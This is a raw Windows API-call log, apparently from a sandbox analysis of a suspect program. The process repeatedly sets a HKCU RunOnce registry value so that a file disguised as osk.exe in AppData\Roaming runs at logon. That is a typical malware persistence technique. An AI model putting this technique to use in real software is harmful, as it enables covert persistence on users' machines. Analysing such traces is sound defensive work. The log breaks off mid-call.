[0102.000] IUnknown:Release (This=0x7a9740) returned 0x1 [0102.000] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0102.000] SetTimer (hWnd=0x20280, nIDEvent=0x23b6, uElapse=0xa, lpTimerFunc=0x0) returned 0x23b6 [0102.000] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0102.016] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0102.016] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0102.016] KillTimer (hWnd=0x20280, uIDEvent=0x23b6) returned 1 [0102.017] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0102.017] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0102.017] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0102.017] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0102.018] RegCloseKey (hKey=0x280) returned 0x0 [0102.018] IUnknown:Release (This=0x7a9740) returned 0x1 [0102.018] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0102.018] SetTimer (hWnd=0x20280, nIDEvent=0x23b7, uElapse=0xa, lpTimerFunc=0x0) returned 0x23b7 [0102.018] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0102.029] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0102.029] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0102.030] KillTimer (hWnd=0x20280, uIDEvent=0x23b7) returned 1 [0102.030] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0102.030] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0102.030] 
RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0102.031] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0102.031] RegCloseKey (hKey=0x280) returned 0x0 [0102.031] IUnknown:Release (This=0x7a9740) returned 0x1 [0102.031] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0102.031] SetTimer (hWnd=0x20280, nIDEvent=0x23b8, uElapse=0xa, lpTimerFunc=0x0) returned 0x23b8 [0102.031] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0102.045] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0102.046] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0102.046] KillTimer (hWnd=0x20280, uIDEvent=0x23b8) returned 1 [0102.046] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0102.046] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0102.046] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0102.047] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0102.047] RegCloseKey (hKey=0x280) returned 0x0 [0102.047] IUnknown:Release (This=0x7a9740) returned 0x1 [0102.047] 
ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0102.047] SetTimer (hWnd=0x20280, nIDEvent=0x23b9, uElapse=0xa, lpTimerFunc=0x0) returned 0x23b9 [0102.047] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0102.062] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0102.062] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0102.062] KillTimer (hWnd=0x20280, uIDEvent=0x23b9) returned 1 [0102.063] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0102.063] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0102.063] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0102.063] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0102.064] RegCloseKey (hKey=0x280) returned 0x0 [0102.064] IUnknown:Release (This=0x7a9740) returned 0x1 [0102.064] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0102.064] SetTimer (hWnd=0x20280, nIDEvent=0x23ba, uElapse=0xa, lpTimerFunc=0x0) returned 0x23ba [0102.064] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.105] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.105] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.105] KillTimer (hWnd=0x20280, uIDEvent=0x23ba) returned 1 [0103.105] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.108] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.108] RegCreateKeyExA (in: hKey=0x80000001, 
lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.108] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.108] RegCloseKey (hKey=0x280) returned 0x0 [0103.108] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.108] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.108] SetTimer (hWnd=0x20280, nIDEvent=0x23bb, uElapse=0xa, lpTimerFunc=0x0) returned 0x23bb [0103.108] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.204] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.204] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.205] KillTimer (hWnd=0x20280, uIDEvent=0x23bb) returned 1 [0103.205] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.205] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.205] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.206] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.206] RegCloseKey (hKey=0x280) returned 0x0 [0103.206] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.206] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 
[0103.206] SetTimer (hWnd=0x20280, nIDEvent=0x23bc, uElapse=0xa, lpTimerFunc=0x0) returned 0x23bc [0103.206] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.215] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.215] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.215] KillTimer (hWnd=0x20280, uIDEvent=0x23bc) returned 1 [0103.216] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.216] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.216] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.216] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.216] RegCloseKey (hKey=0x280) returned 0x0 [0103.216] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.217] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.217] SetTimer (hWnd=0x20280, nIDEvent=0x23bd, uElapse=0xa, lpTimerFunc=0x0) returned 0x23bd [0103.217] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.231] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.231] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.231] KillTimer (hWnd=0x20280, uIDEvent=0x23bd) returned 1 [0103.231] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.231] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.232] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, 
dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.232] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.232] RegCloseKey (hKey=0x280) returned 0x0 [0103.232] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.232] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.232] SetTimer (hWnd=0x20280, nIDEvent=0x23be, uElapse=0xa, lpTimerFunc=0x0) returned 0x23be [0103.232] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.248] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.248] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.249] KillTimer (hWnd=0x20280, uIDEvent=0x23be) returned 1 [0103.249] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.249] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.249] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.249] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.250] RegCloseKey (hKey=0x280) returned 0x0 [0103.250] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.250] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.250] SetTimer (hWnd=0x20280, nIDEvent=0x23bf, uElapse=0xa, lpTimerFunc=0x0) returned 0x23bf 
[0103.250] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.262] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.262] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.262] KillTimer (hWnd=0x20280, uIDEvent=0x23bf) returned 1 [0103.262] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.262] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.263] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.263] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.263] RegCloseKey (hKey=0x280) returned 0x0 [0103.263] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.263] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.263] SetTimer (hWnd=0x20280, nIDEvent=0x23c0, uElapse=0xa, lpTimerFunc=0x0) returned 0x23c0 [0103.263] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.277] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.277] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.278] KillTimer (hWnd=0x20280, uIDEvent=0x23c0) returned 1 [0103.278] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.278] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.278] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: 
phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.278] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.279] RegCloseKey (hKey=0x280) returned 0x0 [0103.279] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.279] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.279] SetTimer (hWnd=0x20280, nIDEvent=0x23c1, uElapse=0xa, lpTimerFunc=0x0) returned 0x23c1 [0103.279] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.293] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.293] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.293] KillTimer (hWnd=0x20280, uIDEvent=0x23c1) returned 1 [0103.293] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.295] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.295] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.295] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.295] RegCloseKey (hKey=0x280) returned 0x0 [0103.295] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.295] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.296] SetTimer (hWnd=0x20280, nIDEvent=0x23c2, uElapse=0xa, lpTimerFunc=0x0) returned 0x23c2 [0103.296] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: 
lpMsg=0x33f7fc) returned 1 [0103.309] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.309] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.309] KillTimer (hWnd=0x20280, uIDEvent=0x23c2) returned 1 [0103.309] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.309] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.309] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.310] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.310] RegCloseKey (hKey=0x280) returned 0x0 [0103.310] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.310] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.310] SetTimer (hWnd=0x20280, nIDEvent=0x23c3, uElapse=0xa, lpTimerFunc=0x0) returned 0x23c3 [0103.310] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.324] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.324] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.324] KillTimer (hWnd=0x20280, uIDEvent=0x23c3) returned 1 [0103.325] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.325] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.325] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.326] RegSetValueExA (in: 
hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.326] RegCloseKey (hKey=0x280) returned 0x0 [0103.326] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.326] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.326] SetTimer (hWnd=0x20280, nIDEvent=0x23c4, uElapse=0xa, lpTimerFunc=0x0) returned 0x23c4 [0103.326] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.340] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.340] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.340] KillTimer (hWnd=0x20280, uIDEvent=0x23c4) returned 1 [0103.340] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.341] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.341] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.341] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.341] RegCloseKey (hKey=0x280) returned 0x0 [0103.341] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.342] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.342] SetTimer (hWnd=0x20280, nIDEvent=0x23c5, uElapse=0xa, lpTimerFunc=0x0) returned 0x23c5 [0103.342] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.356] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.356] 
DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.356] KillTimer (hWnd=0x20280, uIDEvent=0x23c5) returned 1 [0103.356] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.357] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.357] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.357] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.357] RegCloseKey (hKey=0x280) returned 0x0 [0103.357] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.357] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.357] SetTimer (hWnd=0x20280, nIDEvent=0x23c6, uElapse=0xa, lpTimerFunc=0x0) returned 0x23c6 [0103.357] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.371] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.371] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.371] KillTimer (hWnd=0x20280, uIDEvent=0x23c6) returned 1 [0103.372] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.372] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.372] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.372] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.373] RegCloseKey (hKey=0x280) returned 0x0 [0103.373] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.373] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.373] SetTimer (hWnd=0x20280, nIDEvent=0x23c7, uElapse=0xa, lpTimerFunc=0x0) returned 0x23c7 [0103.373] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.387] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.387] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.388] KillTimer (hWnd=0x20280, uIDEvent=0x23c7) returned 1 [0103.388] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.388] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.389] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.389] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.389] RegCloseKey (hKey=0x280) returned 0x0 [0103.389] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.389] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.389] SetTimer (hWnd=0x20280, nIDEvent=0x23c8, uElapse=0xa, lpTimerFunc=0x0) returned 0x23c8 [0103.389] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.404] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.404] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.404] KillTimer (hWnd=0x20280, 
